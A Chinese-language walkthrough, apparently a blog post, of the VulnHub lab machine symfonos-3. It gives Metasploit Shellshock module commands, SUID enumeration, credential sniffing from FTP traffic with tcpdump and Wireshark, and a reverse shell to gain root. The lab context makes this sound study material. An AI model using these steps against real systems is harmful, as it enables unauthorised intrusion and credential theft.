https://www.vulnhub.com/entry/symfonos-3,332/
目标
-得到root
*如果要下载来玩建议不要看, 因为剧透了
1. 打开你的Kali和靶机(symfonos3)
2. 使用netdiscover扫描靶机.
3.使用Zenmap扫描靶机看有什么服务端口.
3. 因为有开放端口80 http Apache服务所以一定有网站.
4. 查看网页码, 发现有一句"Can you bust the underworld" 我理解为深入调查吧. (科科
5. 这里不用dirb打开DirBuster, 来深入交流交流
Target URL (填写你的靶机IP)
File With List of dirs/files (这里我选择dirbuster自带的字典)
点击Start
6. 等了一下看看Results, 那么这些都是被发现了的网址只有一个一个检查看哪个是有用的.
7. 首先是http://192.168.1.109/gate/,只有图片没有任何资料.
8. 再来就是http://192.168.1.109/gate/cerberus/也是没有收获.
9.那么这是最后一个网址http://192.168.1.109/cgi-bin/underworld/
字典跑完没有其它网址就只有这个网页有可疑, 但我又经验不足所以上网看了看攻略@@得知这有可能是一个
shellshock vulnerability.
10. 知道后当然是找一找shellshock vulnerability的资料,打开metasploit#msfconsole
找一找有没有shellshock果然有
那么我们就调用第5个 因为我们运行的服务是http而且是Apache.
11. 调用那个Payload.
>use exploit/multi/http/apache_mod_cgi_bash_env_exec
>set RHOST [靶机IP]
>set LHOST [自己IP]
>set targeturi /cgi-bin/underworld/
>show options
12.确定设定后运行它, 成功得到 Metersploit Shell.
>exploit
13.输入Shell进入Shell,然后使用命令 python -c 'import pty; pty.spawn("/bin/bash")' 交换Shell.
14. 试一试看有没有能用的指令. 和列出全部SUID标记文件看有什么能用.
#find / -perm -u=s -type f 2>/dev/null
15. 查看一下 /tmp/etc/passwd下有没有用户密码Hash可以破解,没有Hash但有发现用户名hades.
16. 然后我发现git clone和wget可以用.
17. 就下载一个pspy64扫描一下.
#wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
*pspy是一种命令行工具,旨在无需根权限就可以窥探进程。
它使您可以查看其他用户执行的命令,cron作业等。
非常适合枚举CTF中的Linux系统。
很好地向您的同事展示为什么在命令行中将秘密作为参数传递是一个坏主意。
该工具从procfs扫描中收集信息。
放置在文件系统选定部分上的Inotify观察程序将触发这些扫描,以捕获短暂的进程。
18. 运行pspy64, 参数我就不解释了.
19. 看到这个使用root运行的ftpclient而且是运行着的, 去看了一下是需要权限的.
上网查了一下发现是一个拥有和FTP服务器交互数据相同功能.
20. 查看/tmp/tcpdump -D 看下有一个数据一直循环发送和接受.
那么就把它的pcap包哦弄出来.
21. 然后我们就有了这个file.pcap文件, 下载到Kali下.
22. 使用wireshark打开pcap包, 过滤tcp.port == 21 && ip.src==192.168.1.109 等一下对着随便一行右键Follow就可以看见了 Username和Password.
23. 那么有了Username和Password
24. 去到我们刚刚看到的ftpclient文件夹看看, 那么里面有一个ftpclient.py.
里面有运行一些东西.
25. 那么就试一试看能不能反弹Shell.
26. Kali下打开监听.
28. 等一下就收到了.
29. 查看有没有得到root,有那么就查看root文件夹里面的proof.txt. 完成.
感谢阅读
No comments:
Post a Comment